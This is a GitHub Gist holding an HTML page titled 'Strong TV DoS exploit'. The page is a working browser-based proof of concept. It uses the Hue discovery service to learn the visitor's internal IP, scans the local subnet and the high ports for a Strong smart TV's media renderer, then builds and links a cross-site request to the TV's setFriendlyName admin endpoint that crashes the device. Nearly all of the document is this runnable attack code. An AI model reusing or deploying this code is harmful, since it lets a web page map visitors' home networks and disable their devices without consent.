Last active
March 11, 2021 11:41
-
-
Save vavkamil/1b1c14702198dd721c4d478ac15d0ac0 to your computer and use it in GitHub Desktop.
strong-tv-dos-poc.html
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <title></title> | |
| </head> | |
| <body> | |
| <h1>Strong TV DoS exploit</h1> | |
| <h2>Proof of Concept</h2> | |
| <label for="internal_ip">Any internal IP:</label> | |
| <input type="text" name="internal_ip" id="internal_ip" autocomplete="off" onchange="get_tv_ip()"> | |
| <br><br> | |
| <label for="tv_ip">Smart TV IP:</label> | |
| <input type="text" name="tv_ip" id="tv_ip" autocomplete="off" onchange="scan_tv_ports()"> | |
| <br><br> | |
| <label for="tv_port">Smart TV Port:</label> | |
| <input type="text" name="tv_port" id="tv_port" autocomplete="off"> <em>This may take a couple of minutes</em> | |
| <br><br> | |
| <label for="web_admin">Media Renderer Administration:</label> | |
| <input type="text" name="web_admin" id="web_admin" autocomplete="off"> | |
| <br><br> | |
| <label for="exploit_code">Exploit code:</label> | |
| <textarea name="exploit_code" id="exploit_code" autocomplete="off" style="width:680px;height:130px;"></textarea> | |
| <br><br> | |
| <label for="exploit_poc">Exploit:</label> | |
| <a href="#" name="exploit_poc" id="exploit_poc" target="_blank">Proof of Concept</a> | |
| <br><br> | |
| <script> | |
| get_hue_ip(); | |
| async function scan_tv_ports(ip) { | |
| var check = 0; | |
| // dynamic ports 49152 - 65535 | |
| var ports = get_ports_array(49152,65535); | |
| for (var i = 0; i < ports.length; i++) { | |
| if(check != 0) { break; } | |
| await new Promise(resolve => setTimeout(resolve, 50)); | |
| var img = document.createElement("img"); | |
| img.setAttribute("src", "http://"+ip+":"+ports[i]+"/web/file/largeIco.jpg"); | |
| img.style.width = "10px"; | |
| img.style.height = "10px"; | |
| //img.style.display = "none"; | |
| img.id = ports[i]; | |
| img.name = ip; | |
| img.onload = function () { | |
| check = 1; | |
| document.getElementById("tv_port").value = this.id; | |
| document.getElementById("web_admin").value = "http://"+this.name+":"+this.id+"/web"; | |
| var code = "\ | |
| <script>\n\ | |
| function submitRequest() {\n\ | |
| var xhr = new XMLHttpRequest();\n\ | |
| xhr.open('GET', '"+"http://"+this.name+":"+this.id+"/web"+"/admin/setFriendlyName?name=%hostname%', true);\n\ | |
| xhr.send();\n\ | |
| }\n\ | |
| submitRequest();\n\ | |
| <\/script>"; | |
| document.getElementById("exploit_code").value = code; | |
| document.getElementById("exploit_poc").href = "http://"+this.name+":"+this.id+"/web"+"/admin/setFriendlyName?name=%hostname%"; | |
| console.log(this.id); | |
| }; | |
| document.body.appendChild(img); | |
| setTimeout(function () { | |
| this.continue; | |
| }, 50); | |
| } | |
| var imgs = document.querySelectorAll('img'); | |
| for (var i = 0; i < imgs.length; i++) { | |
| imgs[i].parentNode.removeChild(imgs[i]); | |
| } | |
| } | |
| function get_tv_ip() { | |
| var local_ip = document.getElementById("internal_ip").value; | |
| var ips = ip_to_range(local_ip); | |
| scan(ips); | |
| } | |
| function get_hue_ip() { | |
| var xhr = new XMLHttpRequest(); | |
| xhr.open("GET", "https://discovery.meethue.com/") | |
| xhr.send(); | |
| xhr.onreadystatechange = function(e) { | |
| var hue_ip; | |
| if (xhr.readyState === 4) { | |
| var response = xhr.responseText; | |
| var obj = JSON.parse(response); | |
| hue_ip = obj[0].internalipaddress; | |
| document.getElementById("internal_ip").value = hue_ip; | |
| get_tv_ip(); | |
| } | |
| } | |
| } | |
| function ip_to_range(ip) { | |
| var ips = []; | |
| var ip_parts = ip.split( '.' ); | |
| if( ip_parts.length !== 4 ) { | |
| return false; | |
| } | |
| for( var i = 1; i < 255; i++ ) { | |
| var tmp_ip = ip_parts[0] + '.' + ip_parts[1] + '.' + ip_parts[2] + '.' + i; | |
| ips.push( tmp_ip ); | |
| } | |
| return ips; | |
| } | |
| function get_ports_array(lowEnd, highEnd) { | |
| var ports = []; | |
| for (var i = lowEnd; i <= highEnd; i++) { | |
| ports.push(i); | |
| } | |
| return ports; | |
| } | |
| function scan(ips) { | |
| for (var i = 0; i < ips.length; i++) { | |
| var ifrm = document.createElement("iframe"); | |
| ifrm.setAttribute("src", "http://"+ips[i]+":9080"); | |
| ifrm.style.width = "10px"; | |
| ifrm.style.height = "10px"; | |
| ifrm.id = ips[i]; | |
| ifrm.onload = function () { | |
| var iframes = document.querySelectorAll('iframe'); | |
| for (var i = 0; i < iframes.length; i++) { | |
| iframes[i].parentNode.removeChild(iframes[i]); | |
| } | |
| document.getElementById("tv_ip").value = this.id; | |
| scan_tv_ports(this.id); | |
| }; | |
| document.body.appendChild(ifrm); | |
| setTimeout(function () { | |
| this.continue; | |
| }, 50); | |
| } | |
| } | |
| </script> | |
| </body> | |
| </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment